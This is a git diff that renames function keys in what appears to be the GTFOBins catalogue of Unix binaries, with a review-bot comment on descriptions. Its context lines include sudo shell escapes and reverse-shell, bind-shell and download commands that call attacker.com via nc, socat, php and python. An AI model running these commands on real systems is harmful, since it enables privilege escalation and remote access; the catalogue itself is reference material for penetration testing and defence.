diff --git a/_data/functions.yml b/_data/functions.yml
index 7a3d5e9..c5d5771 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -1,9 +1,9 @@
-exec-interactive:
- label: Interactive
+execute-interactive:
+ label: Interactive execute
 description: It executes interactive commands that may be exploited to break out from restricted shells.
-exec-non-interactive:
- label: Non-interactive
+execute-non-interactive:
+ label: Non-interactive execute
 description: It executes non-interactive commands that may be exploited to break out from restricted shells.
 suid-enabled:
@@ -26,18 +26,14 @@ upload:
 label: Upload
 description: It can exfiltrate files on the network.
-bind-shell:
- label: Bind shell
+bind-shell-interactive:
+ label: Interactive bind shell
 description: It can bind a shell to a local port to allow remote network access.
-reverse-shell:
- label: Reverse shell
+reverse-shell-interactive:
+ label: Interactive reverse shell
 description: It can send back a reverse shell to a listening attacker to open a remote network access.
-load-library:
- label: Library load
- description: It loads shared libraries that may be used to run code in the binary execution context.
-
 bind-shell-non-interactive:
 label: Non-interactive bind shell
 description: It can bind a non-interactive shell to a local port to allow remote network access.
@@ -45,3 +41,7 @@ bind-shell-non-interactive:
 reverse-shell-non-interactive:
 label: Non-interactive reverse shell
 description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
+
+load-library:
+ label: Library load
+ description: It loads shared libraries that may be used to run code in the binary execution context.
diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index cfff65a..8963e7a 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: ash
 sudo-enabled:
 - code: sudo ash
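Review bot: In the second functions.yml hunk the labels of bind-shell-interactive and reverse-shell-interactive are updated but their descriptions are not, so the interactive and non-interactive entries now differ in the key and label while the description only carries the distinction on the non-interactive side. Suggest `description: It can bind an interactive shell to a local port to allow remote network access.` and `description: It can send back an interactive reverse shell to a listening attacker to open a remote network access.` so each entry's description states the property its key encodes. Since these keys are referenced by name from every `_gtfobins/*.md` page in the same commit, a page still carrying an old key (`exec-interactive`, `bind-shell`, `reverse-shell`, `load-library` is unchanged) would presumably no longer match a definition; a short comment at the top of functions.yml noting that keys are the lookup identifiers used by the per-binary pages would help future renames.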
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 1ae286b..c6fa9b7 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: awk 'BEGIN {system("/bin/sh")}'
 sudo-enabled:
 - code: sudo awk 'BEGIN {system("/bin/sh")}'
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index d2b6f5c..4eb23cf 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: bash
 sudo-enabled:
 - code: sudo bash
@@ -34,7 +34,7 @@ functions:
 export RPORT=12345
 export LFILE=file_to_get
 bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index e5890be..a112601 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: csh
 sudo-enabled:
 - code: sudo csh
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 5bf6f76..8b93d4d 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: dash
 sudo-enabled:
 - code: sudo dash
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index d0c7a6c..b85d737 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 ed
 !/bin/sh
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 2655229..b8bc630 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: emacs -Q -nw --eval '(term "/bin/sh")'
 sudo-enabled:
 - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index b3e014f..e0b5368 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: env /bin/sh
 sudo-enabled:
 - code: sudo env /bin/sh
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 9cd0f3d..421084a 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: expect -c 'spawn /bin/sh;interact'
 sudo-enabled:
 - code: sudo expect -c 'spawn /bin/sh;interact'
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index 433fadb..2305f6b 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: find . -exec /bin/sh \; -quit
 sudo-enabled:
 - code: sudo find . -exec /bin/sh \; -quit
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index 35e642e..c8647d6 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 ftp
 !/bin/sh
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index c1bd0fc..186c64e 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: gdb -nx -ex '!sh' -ex quit
 sudo-enabled:
 - code: sudo gdb -nx -ex '!sh' -ex quit
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index bb95116..6866485 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: ionice /bin/sh
 sudo-enabled:
 - code: sudo ionice /bin/sh
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index 2edbb4e..84d96a4 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -7,7 +7,7 @@ description: |
 /lib64/ld-linux-x86-64.so.2
 ```
 functions:
- exec-interactive:
+ execute-interactive:
 - code: /lib/ld.so /bin/sh
 sudo-enabled:
 - code: sudo /lib/ld.so /bin/sh
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index 6a0d293..07f76c4 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 less /etc/profile
 !/bin/sh
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index f706b14..e25fa87 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 man man
 !/bin/sh
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index 73c0fd4..0e50f41 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 TERM= more /etc/profile
 !/bin/sh
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index c65aae2..f3d5e76 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -14,13 +14,13 @@ functions:
 LPORT=12345
 LFILE=where_to_save
 nc -l -p $LPORT > "$LFILE"
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 RHOST=attacker.com
 RPORT=12345
 nc -e /bin/sh $RHOST $RPORT
- bind-shell:
+ bind-shell-interactive:
 - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
 code: |
 LPORT=12345
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 67cb023..9c9aa35 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
 sudo-enabled:
@@ -9,7 +9,7 @@ functions:
 suid-enabled:
 - code: |
 ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
@@ -20,7 +20,7 @@ functions:
 sh.stdout.pipe(this);
 sh.stderr.pipe(this);
 });'
- bind-shell:
+ bind-shell-interactive:
 - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
 code: |
 export LPORT=12345
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index d26420b..c423a7f 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,12 +1,12 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: perl -e 'exec "/bin/sh";'
 sudo-enabled:
 - code: sudo perl -e 'exec "/bin/sh";'
 suid-enabled:
 - code: ./perl -e 'exec "/bin/sh";'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 34b3ad4..d56499e 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-non-interactive:
+ execute-non-interactive:
 - code: |
 export CMD="ls /"
 php -r 'system(getenv("CMD"));'
@@ -39,7 +39,7 @@ functions:
 export URL=http://attacker.com/file_to_get
 export LFILE=where_to_save
 php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index 835f5a6..1b64190 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: python2 -c 'import os; os.system("/bin/sh")'
 sudo-enabled:
 - code: sudo python2 -c 'import os; os.system("/bin/sh")'
@@ -22,7 +22,7 @@ functions:
 export URL=http://attacker.com/file_to_get
 export LFILE=where_to_save
 python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 3d9ffca..9342130 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: python3 -c 'import os; os.system("/bin/sh")'
 sudo-enabled:
 - code: sudo python3 -c 'import os; os.system("/bin/sh")'
@@ -22,7 +22,7 @@ functions:
 export URL=http://attacker.com/file_to_get
 export LFILE=where_to_save
 python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index d52e84c..67d2f53 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
 sudo-enabled:
 - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 5654fc5..5d9eee1 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
 sudo-enabled:
 - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 66b3cea..8335338 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: ruby -e 'exec "/bin/sh"'
 sudo-enabled:
 - code: sudo ruby -e 'exec "/bin/sh"'
@@ -9,7 +9,7 @@ functions:
 code: |
 export LPORT=8888
 ruby -run -e httpd . -p $LPORT
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 08ec9d1..870b69f 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-non-interactive:
+ execute-non-interactive:
 - code: |
 TF=$(mktemp)
 CMD="id"
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index bbd73f9..af80824 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: setarch $(arch) /bin/sh
 sudo-enabled:
 - code: sudo setarch $(arch) /bin/sh
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 0bcbaeb..ef10773 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 HOST=user@attacker.com
 sftp $HOST
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 5418a54..e50102d 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,12 +1,12 @@
 ---
 functions:
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
 code: |
 RHOST=attacker.com
 RPORT=12345
 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
- bind-shell:
+ bind-shell-interactive:
 - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
 code: |
 LPORT=12345
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 831f0aa..774a9c2 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - description: Reconnecting may help bypassing restricted shells.
 code: ssh localhost /bin/bash --noprofile --norc
 download:
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 1a23aa0..61374f4 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: strace -o /dev/null /bin/sh
 sudo-enabled:
 - code: sudo strace -o /dev/null /bin/sh
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index b7ed7d4..e823db5 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 sudo-enabled:
 - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 9042146..78630bb 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: taskset 1 /bin/sh
 sudo-enabled:
 - code: sudo taskset 1 /bin/sh
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index c7ae1f4..f233314 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 tclsh
 exec /bin/sh <@stdin >@stdout 2>@stderr
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index f45e28a..bc48656 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - description: BSD version only. Needs to be connected first.
 code: |
 RHOST=attacker.com
@@ -8,7 +8,7 @@ functions:
 telnet $RHOST $RPORT
 ^]
 !/bin/sh
- reverse-shell:
+ reverse-shell-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 RHOST=attacker.com
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 1c67ae5..41520ca 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: vi -c ':!/bin/sh'
 - code: |
 vi
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index 230c0e9..a65439e 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: |
 wish
 exec /bin/sh <@stdin >@stdout 2>@stderr
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index 15cc1b3..1db7501 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -1,6 +1,6 @@
 ---
 functions:
- exec-interactive:
+ execute-interactive:
 - code: zsh
 sudo-enabled:
 - code: sudo zsh